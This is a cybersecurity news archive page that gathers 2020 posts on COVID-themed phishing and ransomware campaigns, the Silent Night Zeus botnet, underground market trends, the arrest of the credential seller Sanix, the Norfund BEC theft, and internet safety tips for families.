Category Archives: Cybercrime

Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below is a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn is targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and AbSent-Loader.

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID19-themed attacks from February 1, take a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)

The post Coronavirus-themed attacks May 24 – May 30, 2020 appeared first on Security Affairs.

How to protect your business from COVID-19-themed vishing attacks

Cybercriminals have been using the COVID-19 pandemic as a central theme in all kinds of crisis-related email phishing campaigns. But because of the dramatic rise in the number of at-home workers, one method that has become increasingly common over the past few months is vishing, i.e., phishing campaigns executed via phone calls. Rising success rates are the reason why vishing has become more common, and there are several factors driving this trend: People are … More

The post How to protect your business from COVID-19-themed vishing attacks appeared first on Help Net Security.

What’s trending on the underground market?

Trust has eroded among criminal interactions, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, Trend Micro reveals.

Popular underground goods and services

The report reveals that determined efforts by law enforcement appear to be having an impact on the cybercrime underground. Several forums have been taken down by global police entities, and remaining forums experience persistent DDoS attacks and log-in problems impacting their usefulness. Loss of trust led … More

The post What’s trending on the underground market? appeared first on Help Net Security.

How the Cybercriminal Underground Has Changed in 5 Years

The cybercrime economy is one of the runaway success stories of the 21st century — at least, for those who participate in it. Estimates claim it could be worth over $1 trillion annually, more than the GDP of many countries. Part of that success is due to its ability to evolve and shift as the threat landscape changes. Trend Micro has been profiling the underground cybercrime community for many years. Over the past five years, we’ve seen a major shift to new platforms, communications channels, products and services, as trust on the dark web erodes and new market demands emerge.

We also expect the current pandemic to create yet another evolution, as cyber-criminals look to take advantage of new ways of working and systemic vulnerabilities.

Shifts in the underground

Our latest report, Shifts in the Cybercriminal Underground Markets, charts the fascinating progress of cybercrime over the past five years, through detailed analysis of forums, marketplaces and dark web sites around the world. It notes that in many product areas, the cost of items has dropped as they become commoditised: so where in 2015 you expected to pay $1000 per month for crypting services, today they may be as little as $20.

In other areas, such as IoT botnets, cyber-propaganda and stolen gaming account credentials, prices are high as new products spark surging demand. Fortnite logins can sell for around $1,000 on average, for example.

The good news is that law enforcement action appears to be working. Trend Micro has long partnered with Interpol, Europol, national crime agencies and local police to provide assistance in investigations. So it’s good to see that these efforts are having an impact. Many dark web forums and marketplaces have been infiltrated and taken down over the past five years, and our researchers note that current users complain of DDoS-ing and log-in issues.

Cybercriminals have been forced to take extreme measures as trust erodes among the community, for example, by using gaming communications service Discord to arrange trades, and e-commerce platform Shoppy.gg to sell items. A new site called DarkNet Trust was even created to tackle this specific challenge: it aims to verify cybercrime vendors’ reputations by analysing their usernames and PGP fingerprints.

What does the future hold?

However, things rarely stay still on the cybercrime underground. Going forward, we expect to see a range of new tools and techniques flood dark web stores and forums. AI will be at the centre of these efforts. Just as it’s being used by Trend Micro and other companies to root out fraud, sophisticated malware and phishing, it could be deployed in bots designed to predict roll patterns on gambling sites. It could also be used in deepfake services developed to help buyers bypass photo ID systems, or launch sextortion campaigns against individuals.

Some emerging trends are less hi-tech but no less damaging. Log-ins for wearable devices could be stolen and used to request replacements under warranty, defrauding the customer and costing the manufacturers dear. In fact, access to devices, systems and accounts is so common today that we’re already seeing it spun out in “as-a-service” cybercrime offerings. Prices for access to Fortune 500 companies can hit as much as $10,000.

Post-pandemic threats

Then there’s COVID-19. We’re already seeing fraudsters targeting government stimulus money with fake applications, sometimes using phished information from legitimate businesses. And healthcare organisations are being targeted with ransomware as they battle to save lives.

Even as the pandemic recedes, remote working practices are likely to stay in many organisations. What does this mean for cybercrime? It means more targeting of VPN vulnerabilities with malware and DDoS services. And it means more opportunities to compromise corporate networks via connected home devices. Think of it like a kind of Reverse BYOD scenario – instead of bringing devices into work to connect, the corporate network is now merged with home networks.

Tackling such challenges will demand a multi-layered strategy predicated around that familiar trio: people, process and technology. It will require more training, better security for home workers, improved patch management and password security, and much more besides. But most of all it will demand continued insight into global cybercriminals and the platforms they inhabit, to anticipate where the next threats are coming from.

Fortunately, this is where Trend Micro’s expert team of researchers come in. We won’t let them out of our sight.

Malware opens RDP backdoor into Windows systems

A new version of the Sarwent malware can open the Remote Desktop Protocol (RDP) port on target Windows computers to make sure that crooks can find their way back into the system through the backdoor. Whether that access is used later by the same crooks or sold to ransomware gangs or cyber espionage groups is unknown, but affected users should know that removing the malware does not close that particular “backdoor”.

Sarwent’s new capabilities

Sarwent … More

The post Malware opens RDP backdoor into Windows systems appeared first on Help Net Security.

Silent Night Zeus botnet available for sale in underground forums

Experts reported the existence of a botnet, tracked as Silent Night and based on the Zeus banking Trojan, that is available for sale in several underground forums.

This week researchers from Malwarebytes and HYAS published a report that included technical details on a recently discovered botnet, tracked as Silent Night, being distributed via the RIG exploit kit and COVID-19 malspam campaign. 

Silent Night

The source code of the Zeus Trojan has been available in the cybercrime underground since 2011, allowing crooks to develop their own releases ever since.

Experts found multiple variants in the wild, many of them belonging to the Terdot Zbot/Zloader malware family.

The name “Silent Night” Zbot is likely a reference to a weapon mentioned in the 2002 movie xXx. It was first spotted in November 2019, when a seller named “Axe” started offering it on the Russian underground forum forum.exploit[.]in.

Axe was advertising the Trojan as the result of over five years of work; a total of about 15k hours was spent on the development of the malicious code.

“The author described it as a banking Trojan designed with compatibility with Zeus webinjects. Yet, he claims that the code is designed all by him, based on his multiple years of experience – quote: “In general, it took me 5+ years to develop and support the bot, on average about 15k ~ hours were spent.”.” reads the report published by the researchers.

The botnet goes for $4,000 per month for a custom build and $2,000 per month for a general build; HVNC functionality is available as an extra for 1,000 USD/month, and 14 days to test the code costs 500 USD.

Experts believe that Axe is the developer of the Axe Bot 1.4.1. Comparing the Axe Bot 1.4.1 and Zloader 1.8.0 C2 source code, experts noted that all of their custom PHP functions have the prefix CSR, which can either be a namespace or a developer’s handle.

Silent Night is able to grab information from online forms and perform web injections in major browsers, including Google Chrome, Mozilla Firefox, and Internet Explorer, as well as monitor keystrokes, take screenshots, and harvest cookies and passwords.

Silent Night leverages web injections to hijack a user’s session and redirect them to malicious domains or to grab the login credentials for online banking services. Data collected by the malware are then transferred to the operator’s command-and-control (C2) server.

The malware is able to infect all operating systems.

The seller also claims to use an original obfuscator, with decryption performed only “on demand.” The analysis of the content of an open directory on the Command and Control server allowed the researchers to discover a manual for bot operators that includes instructions for setting up the malware.

On Dec 23 2019, this variant of Zloader was observed being distributed by the RIG Exploit Kit; experts observed small campaigns, likely for testing purposes. The spreading intensified over time, and in March 2020 it was delivered in a COVID-19-themed spam campaign using weaponized Word documents.

“The design of Silent Night is consistent and clean, the author’s experience shows throughout the code. Yet, apart from the custom obfuscator, there is not much novelty in this product. The Silent Night is not any game changer, but just yet another banking Trojan based on Zeus.” concludes the report. “Based on the analysis of the bot’s configurations, we may confidently say that there is more than one customer of the “Silent Night”.”

Pierluigi Paganini

(SecurityAffairs – Silent Night, hacking)

The post Silent Night Zeus botnet available for sale in underground forums appeared first on Security Affairs.

The dark web is flooded with offers to purchase corporate network access

There is a flood of interest in accessing corporate networks on the dark web, according to Positive Technologies. In Q1 2020, the number of postings advertising access to these networks increased by 69 percent compared to the previous quarter. This may pose a significant risk to corporate infrastructure, especially now that many employees are working remotely. “Access for sale” on the dark web is a generic term, referring to software, exploits, credentials, or anything else … More

The post The dark web is flooded with offers to purchase corporate network access appeared first on Help Net Security.

Beware of phishing emails urging for a LogMeIn security update

LogMeIn users are being targeted with fake security update requests, which lead to a spoofed phishing page. “Should recipients fall victim to this attack, their login credentials to their LogMeIn account would be compromised. Additionally, since LogMeIn has SSO with Lastpass as LogMeIn is the parent company, it is possible the attacker may be attempting to obtain access to this user’s password manager,” Abnormal Security noted.

The fake LogMeIn security update request

The phishing email … More

The post Beware of phishing emails urging for a LogMeIn security update appeared first on Help Net Security.

Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials

The Ukrainian Secret Service (SSU) has arrested a hacker known as Sanix, who was selling billions of stolen credentials on hacking forums and Telegram channels.

The popular hacker Sanix has been arrested by the Ukrainian Secret Service (SSU). The man is known in the cybercrime underground for selling billions of stolen credentials. The officials did not disclose the name of the cybercriminal; they only said that the man has been arrested in Ivano-Frankivsk, Ukraine.

“The Security Service of Ukraine has identified and detained a hacker known as Sanix. Early last year, it caught the attention of global cybersecurity experts by posting on one of the forums the sale of a database with 773 million e-mail addresses and 21 million unique passwords.” reads a press release published by the SSU.

“SBU cyber specialists recorded the sale of databases with logins and passwords to e-mail boxes, PIN codes for bank cards, e-wallets of cryptocurrencies, PayPal accounts, information about computers hacked for further use in botnets and for organizing DDoS attacks”

The man was known for aggregating data, including users’ credentials, in lists that were offered for sale via Telegram (where he used the nickname Sanixer) or in hacking forums.

Sanix was identified by the investigator Brian Krebs as the source of Collection 1 in January 2019. Some of the most popular collections sold in the past by the same hacker are known as Collection #1, #2, #3, #4, #5, Antipublic, and others.

Collection #1

Sanix has been active on the cybercrime underground at least since 2018, and he focuses on the sale of stolen data from organizations.

It has been estimated that the man amassed billions of unique username-password combinations.

Stolen credentials were bought by fraudsters, hackers, and scammers to carry out a broad range of malicious activities, such as launching malspam campaigns or taking over users’ accounts.

During searches at his residence, SSU officers seized computer equipment containing two terabytes of stolen information, phones with evidence of illegal activities and cash from illegal transactions in the amount of almost 190,000 Ukrainian hryvnias (roughly $7,000) and more than $3000.

Pierluigi Paganini

(SecurityAffairs – Sanix, hacking)

The post Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials appeared first on Security Affairs.

EasyJet reveals cyber-attack exposed 9m customers’ details

Airline apologises after credit card details of about 2,200 passengers were stolen

EasyJet has revealed that the personal information of 9 million customers was accessed in a “highly sophisticated” cyber-attack on the airline.

The company on Tuesday disclosed that email addresses and travel details were accessed and said it will contact all of the customers affected.

Money is still the root of most breaches

Verizon has released its annual Data Breach Investigations Report (DBIR), which offers an overview of the cyber security incidents and data breaches that happened in/were discovered in the past year. Based on an analysis of incident and breach reports by 81 contributing organizations – companies, CERTs, law enforcement agencies and cybercrime units, etc. – from around the world, the DBIR offers insight into current cyber attack trends and the threats organizations in various industry verticals … More

The post Money is still the root of most breaches appeared first on Help Net Security.

New software enables existing sensors to detect ransomware

Engineers from SMU’s Darwin Deason Institute for Cybersecurity have developed software to detect ransomware attacks before attackers can inflict catastrophic damage. Ransomware is crippling cities and businesses all over the world, and the number of ransomware attacks has increased since the start of the coronavirus pandemic. Attackers are also threatening to publicly release sensitive data if ransom isn’t paid. The FBI estimates that ransomware victims have paid hackers more than $140 million in the last … More

The post New software enables existing sensors to detect ransomware appeared first on Help Net Security.

COVID-19 online fraud trends: Industries, schemes and targets

The telecommunications, retail and financial services industries have been increasingly impacted by COVID-19 online fraud, according to TransUnion. From a consumer perspective, Millennials have been most targeted by fraudsters using COVID-19 scams. Overall, the percent of suspected fraudulent digital transactions rose 5% from March 11 to April 28 when compared to Jan. 1 to March 10, 2020. More than 100 million risky transactions from March 11 to April 28 have been identified. “Given the billions … More

The post COVID-19 online fraud trends: Industries, schemes and targets appeared first on Help Net Security.

Crooks stole $10 million from Norway’s state investment fund Norfund

Norway’s state investment fund, Norfund, suffered a business email compromise (BEC) attack in which hackers stole $10 million.

Hackers stole $10 million from Norway’s state investment fund, Norfund, in a business email compromise (BEC) attack.

Norfund is a private equity company established by the Norwegian Storting (parliament) in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

The fraudsters compromised the Norfund email system and monitored communications between the employees of the fund and their partners for months.

Once they had identified the employee responsible for money transfers, the attackers created a Norfund email address to impersonate an individual authorized to transfer large sums of money through the bank Norfund.

In a classic BEC scheme, hackers replaced the payment information provided to the partners to hijack the transfer to an account under their control in a bank in Mexico.

“Through an advance data breach, the defrauders were able to access information concerning a loan of USD 10 million (approx. 100 million NOK) from Norfund to a microfinance institution in Cambodia.” reads a notice published by Norfund.

“The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified”

Norfund was not able to block the fraudulent wire transfer because the attackers managed to delay its discovery.

The BEC attack took place on March 16, but it was discovered more than a month later, on April 30, when the fraudsters attempted to carry out a new fraud, which was detected and blocked.

To delay the discovery of the scam, the attacker sent an email to the Cambodian beneficiary informing it of a delay due to the current Coronavirus lockdown in Norway.

“This is a grave incident. The fraud clearly shows that we, as an international investor and development organisation, through active use of digital channels are vulnerable. The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this” said company CEO, Tellef Thorleifsson.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Crooks stole $10 million from Norway’s state investment fund Norfund appeared first on Security Affairs.

Teaming up with INTERPOL to combat COVID-19 threats

If the past couple of months have taught us anything, it’s that partnerships matter in times of crisis. We’re better, stronger and more resilient when we work together. Specifically, public-private partnerships matter in cybersecurity, which is why Trend Micro is always happy to reach out across industry, academia and law enforcement to offer its expertise.

We are again delighted to be working with long-time partner INTERPOL over the coming weeks on a new awareness campaign to help businesses and remote workers stay safe from a deluge of COVID-19 threats.

The new normal

All over the world, organizations have been forced to rapidly adjust to the new normal: social distancing, government lockdowns and mass remote working. While most have responded superbly to the challenge, there’s no denying that IT security teams and remote access infrastructure are being stretched to the limit. There are understandable concerns that home workers may be more distracted, and therefore likely to click on phishing links, and that their PCs and devices may not be as well protected as corporate equivalents.

At the same time, the bad guys have also reacted quickly to take advantage of the pandemic. Phishing campaigns using COVID as a lure have surged, spoofing health authorities, government departments and corporate senders. BEC attacks try to leverage the fact that home workers may not have colleagues around to check wire transfer requests. And remote infrastructure like RDP endpoints and VPNs are being targeted by ransomware attackers — even healthcare organizations that are simultaneously trying to treat critical patients infected with the virus.

Getting the basics right

That’s why Trend Micro has been pushing out regular updates — not only on the latest scams and threats we’re picking up around the globe, but also with advice on how to secure the newly distributed workforce. Things like improved password security, 2FA for work accounts, automatic software updates, regular back-ups, remote user training, and restricted use of VPNs can all help. We’re also offering six months free use of our flagship Trend Micro Maximum Security product to home workers.

Yet there’s always more to do. Getting the message across as far and wide as possible is where organizations like INTERPOL come in. That’s why we’re delighted to be teaming up with the global policing organization to run a new public awareness campaign throughout May. It builds on highly successful previous recent campaigns we’ve collaborated on, to tackle BEC and crypto-jacking.

This time, we’ll be resharing some key resources on social media to alert users to the range of threats out there, and what businesses and home workers can do to stay safe. And we’ll help to develop infographics and other new messages on how to combat ransomware, online scams, phishing and other threats.

We’re all doing what we can during these difficult days. But if some good can come from a truly terrible event like this, then it’s that we show our strength in the face of adversity. And by following best practices, we can make life much tougher for the cybercriminals looking to profit from tragedy.

Keeping Virtual Play Dates, Hang Outs, and Video Chats Safe for Everyone

Every day we discover (or stumble over) new ways of coping and connecting during this unique chapter in family life. Still, as every age group under your roof finds their favorite virtual play date and hangout apps, parents may need to add a few safety rails to make sure the fun stays fun.

IRL community resurfaces

While this health crisis is devastating in so many ways, it’s also put a spotlight on the many heartwarming ways to connect in real life (IRL). We’re placing teddy bears in our windows for solidarity, creating scavenger hunts for neighborhood kids, serenading shut-ins, publicly supporting first responders, celebrating birthdays and graduations with drive-by parades, and so, so much more.

The ongoing infusion of true, human connection has softened the uncertainty. Still, kids of every age need to maintain an emotional connection with peers. Here are a few things to think about as kids of every age connect with friends online.

Pre-K and Elementary Virtual Play Dates

Since health experts have put restrictions on familiar fun for little ones such as playgrounds, sports leagues, sleepovers, playdates, and even visits with grandparents, parents are relaxing screen time rules and looking for ways to have virtual playdates. Free video tools such as FaceTime and Zoom are proving lifesavers for group art, play, and learning, as are safe websites for young ones and phone apps. (If you run out of things to do, here’s a great list of fun to tap and great learning sites for every age group).

Keep Them Safe

  • Share online experiences with young children at all times. Sit with them to teach, monitor, and explain the context of new digital environments. Also, keep computers and phones in a common area.
  • Try to keep screen time brief. Even young kids can become too screen-reliant.
  • Maximize privacy settings on all devices and turn on safe mode or search on websites and apps.
  • Introduce concepts such as cyberbullying and strangers in age-appropriate language.
  • Start family security efforts early. Consider the benefits of filtering software, safe browsing, and encrypting your family’s digital activity with a Virtual Private Network (VPN).

Middle and High Schooler Virtual Hang Outs

While screen time has spiked, digital connection while homebound is also essential for tweens and teens for both learning and peer relationships. Kids are finding their new virtual hangouts on social networks, group chats, and video games. They are also playing virtual board games using sites such as Pogo, Let’s Play Uno, and Zoom. Netflix Party has become a fun way to watch Netflix with groups of friends.

Keep Them Safe

  • At this age many kids own (or will soon own) a smartphone. With increased time online, you may want to review the basics, such as privacy and location settings. This includes gaming devices.
  • With increased internet use and most schools closed for the year, using parental control software and gaming security software can help parents reduce online risks for children of all ages.
  • Be aware of and talk about trending, risky digital behaviors and challenges that can surface on apps such as TikTok and WhatsApp.
  • Review and approve games and apps before they are downloaded and consider monitoring your children’s devices as well as social profiles and posts.
  • This age group is quick to jump on public wifi, which puts your family’s data at risk. Exploring using a family VPN is critical for this age group.
  • Discuss the danger of connecting with strangers online. Also, discuss the risks of oversharing personal information and photos, even in seemingly private chats and texts. Don’t let boredom lead to bad choices.
  • Discuss cyberbullying and how to block and report accounts that express hateful, racist, or threatening behavior.
  • Coach your kids on using strong passwords and how to verify legitimate websites and identify online scams.

There’s nothing normal for families about this time, but there is something special. Grab it. Keep talking and laughing, especially on the hard days. Have a daily “heart check-in” with your teen if he or she seems to be isolating. Give one another space for topsy turvy moods. And, don’t forget parents, before this is all over, be sure to nail that TikTok dance with your kids and share it with the world!

The post Keeping Virtual Play Dates, Hang Outs, and Video Chats Safe for Everyone appeared first on McAfee Blogs.

Cybersecurity Trends

Trends are interesting since they could tell you where things are going.

I do believe in studying history and behaviors in order to figure out where things are going, so every year my colleagues from Yoroi and I spend several weeks studying and writing up what we observed during the past months in the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year lies not strictly in the number of hacking attempts or in the malware code spread all over the Internet to compromise companies’ assets and data, but in the evolution and consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by state-sponsored actors, cyber-criminals and hacktivists, each with its own attributes in motivations, objectives, methods and sophistication.

During 2019 we observed a rapid evolution of cybercrime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. These actors are also involved in cyber-espionage, CEO fraud, credential-stealing operations, and PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but they are traditionally much more active in so-called “opportunistic” cyber attacks: attacks directed opportunistically at the whole internet population, such as botnet and crypto-miner infection waves. They are also involved in regional operations, for instance ones designed to target European countries like Italy or Germany as branches of major global-scale operations, as we have tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagation waves.

In 2019, as in 2018, ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase of the ransomware phenomenon, both in terms of newborn ransomware families and in ransom payment options, driven by the consolidation of the digital cryptocurrency market, which made the traditional tracking techniques operated by law enforcement agencies less effective due to new untrackable cryptocurrencies. But these increasing volumes weren’t the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators, moved into this emerging sector leveraging their infection capabilities, their long term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

Many major cyber-criminal groups developed a sort of malicious “RedTeam” unit; let’s call them “DarkTeams”. These units are able to manually engage high-value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they also use industry-specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
Actually, this kind of behaviour is not new to us. Such methods of operation have been used for a long time, but not by such a large number of actors and not with such objectives. Network penetration was in fact a peculiarity of state-sponsored groups and specialized cyber-criminal gangs, often threatening the banking and retail sectors, typically referred to as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
During 2019, we observed a strong game change in the ransomware attack panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks, carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high-impact business attacks modeled to be very effective in the victim’s context. We are facing an evolution of ransomware: the introduction of Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operations of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they were only the tip of the iceberg. Many other criminal groups have consolidated this kind of operation, such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shaming of their victims. Maze was one of the first actors pioneering this practice in 2019: the group started to disclose the names of the private companies they hacked into, along with pieces of internal data stolen during the network intrusions.

The problem arises when the stolen data includes Intellectual Property and Personally Identifiable Information. In such a case the attacker leaves the victim organization in an additional, unfortunate position during the cyber-crisis: handling the data breach and the fines imposed by the Data Protection Authorities. During 2020 we expect these kinds of practices to become more and more common in criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy, leveraging services like Yoroi’s Cyber Security Defence Center, could be crucial to equip the company with the proper technology to acquire visibility on targeted ransomware attacks, and with the knowledge, skills and processes to spot and handle this new class of threats.

Zero-Day Malware

Well-known threats are always easier to recognize and manage, since their components and intents are very often clear. For example, ransomware as known today performs some standard operations such as (but not limited to) reading a file, encrypting it and writing it back. Early discovery of known threat families helps analysts perform quick and precise analyses, while unknown threats are always difficult to manage, since analysts first need to discover the intentions and then map the behaviour back to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform, trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi’s technology reports whether the malicious files are potentially detected by anti-virus technologies at detection time. This specific analysis is mainly done to figure out whether the incoming threat would be able to bypass perimeter and endpoint defences. As a positive side effect, we collect data on detected threats related to their notoriety. In other words, we are able to see if malware belonging to a threat actor or related to a specific operation (or incident) is detected by AV, Firewall, Next Generation X and the endpoints in use.
In this context, we shall define what we mean by Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of arbitrary malware families. The following image (Fig:1) shows how most of the analyzed malware is unknown to the InfoSec community and to common antivirus vendors. This finding reflects the ever-evolving malware panorama, in which attackers start from a shared code base but modify it depending on their need for stealth.

The reported data are collected during the first propagation of the malicious files across organizations. It means companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases, where the attack stays stealthy for hours or even days.
Along with the Zero-Day malware observation, most known malware does not have a high chance of being blocked by security controls at the time of delivery. 8% of the malware is detected by few AV engines, and only 33% is actually well identified at the time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed, less than 20% of the analyzed samples belonging to the “not Zero-Day” class are detected by more than 15 AV engines.

Drilling down into the behavioural classification of the intercepted samples known to fewer than 5 antivirus engines at detection time, we can see that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or components) leads the way with 54% of cases, slightly decreasing since 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% in 2018 to the current 2%, and the bullish rise of “Trojan” behaviours up to 35% of cases, more than double the 15% of 2018.
This trend supports the evidence that ransomware attacks in 2019 began to follow a targeted approach, as described in the “The Rise of Targeted Ransomware” section.

A reasonable interpretation of the darkling changes in these data is consistent with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, many of the delivered malware samples are actually a single part of a more complex infection chain: a chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.

This trend gets further validation in the Zero-Day malware data set: the samples likely unknown to the InfoSec community at the time of delivery substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan rose from 28% to 52% of cases, showing similar macro variations.

If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Internet Safety for Kids: A Refresher for Homebound Families

Editor’s Note: This is part II of our internet safety for kids series. Part I focuses on younger children and can be read here.

Parents have always been concerned about keeping their kids safe online — especially their tweens and teens. That conversation is even more critical with parents and kids now working and learning at home. But as the days turn into weeks, the line between safe and risky digital behavior may get a little blurry. Maybe we can help by refreshing some basics.

Why is internet safety for kids important?

There’s no way around it. Young and old, over time, we’ve tethered nearly every aspect of our lives to the digital realm. If we want to work, bank, shop, pay bills, or connect with family and friends, we have to plug in. A wired life makes internet safety not just important, but mission-critical for parents.

Kids go online for school, to be entertained, and to connect with friends; only they don’t have the emotional maturity or critical thinking skills to process everything they will encounter on the other side of their screens.

That’s where proactive digital parenting comes in.

If our parenting goal is to raise wise, responsible, caring adults, equipped for real life, that goal must also include helping them safeguard their emotional and physical health from online risk. There’s no such thing as a digital platform or product that is 100% safe. So, our best strategy is to learn and pass on skills that mitigate that risk.

What are the dangers of the internet?

Any danger that exists offline is potentially multiplied when we log online due to the vast access the web affords each one of us. In a few clicks, we can unlock a world of possibilities. The flip side? There’s an ever-present battalion of crooks and bullies out to exploit that access. Online we will encounter the best and the worst of humankind. The daily threats to children include bullying, inappropriate content, predators, and the loss of privacy. Add to that list, digital viruses and malware, phishing scams, sharing regrettable content, and gaming addiction.

How can homebound kids avoid digital risk?

So what can we do to ensure the weeks ahead don’t bring more digital risk into our homes? We start by having consistent, candid conversations with our kids about online safety (even if eye-rolling begins). Truth: Your family’s cybersecurity is as strong as the weakest security link in your family. If one family member is lax about internet safety, your entire family’s security is compromised.

So let’s get started with some internet safety basics to share with your tweens and teens. To read internet safety guidelines for younger children, click here.

11 Internet Safety Basics for Homebound Teens

  1. Get candid about content. Your tweens and teens have likely come across inappropriate material online. You can minimize further exposure by discussing expectations and family values around acceptable content — both sharing it and receiving it. Reminder: “Vanishing” Snapchats and deleted content can be easily captured in a screenshot — nothing shared online is private. For extra monitoring muscle, consider adding a parental control software to your family’s internet safety plan.
  2. Keep passwords, software, apps updated. Being homebound gives us all extra time for details. Go through personal and family devices and update all passwords. Keeping device software and apps updated also protects kids from outside risk.
  3. Balance life and tech. Kids can lose their entire day surfing, scrolling, and watching YouTube or TikTok videos. Establishing screen limits helps kids grow healthy tech habits. Consider scheduling device breaks, no phone zones (dinner table, movie time, bedtime), and installing software that features time limits.
  4. Be a leader online. Yoda was on target — with much power comes much responsibility. Many online dangers can be diminished by consistently teaching kids to be upstanders online. Practicing empathy, respect, tolerance, and compassion makes the digital world safer for everyone.
  5. Address peer pressure. Kids with devices can share unwise, personal photos with friends they trust. When friendships end, however, those photos can be shared or used for bullying or extortion. Discuss digital peer pressure with your child and how to respond.
  6. Look out for scams. Talk frequently about the many forms scams can take, such as phishing, malware, catfishing, fake news, and clickbait.
  7. Don’t friend strangers. Sexual predators create fake social media accounts specifically to befriend kids. In turn, kids share personal info, daily plans, location, and may even agree to meet in person with online friends. Discuss these risky scenarios and other manipulation tactics of predators with your child. Be aware of his or her friend circles, and look for chat apps such as WhatsApp or Kik.
  8. Maximize privacy on social profiles. Help kids maximize privacy settings on social profiles and delete any profile or post information that unintentionally gives away personal data. Consider removing the names of family members, pets, school, hometown, and birthdays. Hackers can piece together this information to crack passwords or create authentic-looking phishing scams.
  9. Consider a family VPN. Virtual Private Networks are becoming the most popular way to conduct business, shop, and safeguard a family’s online activity from outsiders. VPN encryption can protect a child against several virtual threats.
  10. Review gaming safety. If your kids spend a lot of time on games like Fortnite and Call of Duty, they can encounter strangers, bullying, and scams that target gamers. Teen gamers should use a firewall to help block would-be attackers from gaining access to their PC and home networks, as well as a comprehensive security solution to protect devices from malware and other threats.
  11. Monitor devices. Consider spot-checking all devices routinely. Review privacy settings on social networks (kids change them), look for new apps, review browsing history, chats, and texts. Need to go a step farther? Keep your child’s phone for a few hours to check notifications that pop up. You may find activity that wasn’t necessarily visible otherwise.

Taming all the moving parts of internet safety isn’t easy, and balancing your relationship with your child and parental monitoring can get turbulent at times. While kids can experience more drama and anxiety by going online, social networks remain critical channels for affirmation, self-expression, and connection. In the weeks to come, take time to listen, learn, and get to know your child’s digital passions and patterns. Identify safety gaps and reinforce those areas. Good luck, parents, you’ve got this!

The post Internet Safety for Kids: A Refresher for Homebound Families appeared first on McAfee Blogs.

How to Stay Cyber Safe While Social-Distancing

Do you find yourself working from home these days? Kids off school too? Then your daily life is set to change super-fast. Yes, there is so much to organise to implement this essential ‘social distancing’ strategy. But in the flurry to get everyone set up, it’s essential that we don’t cut corners or make rash decisions, so we can ensure both our headspace and online safety aren’t at risk.

The New Era of Social-Distancing

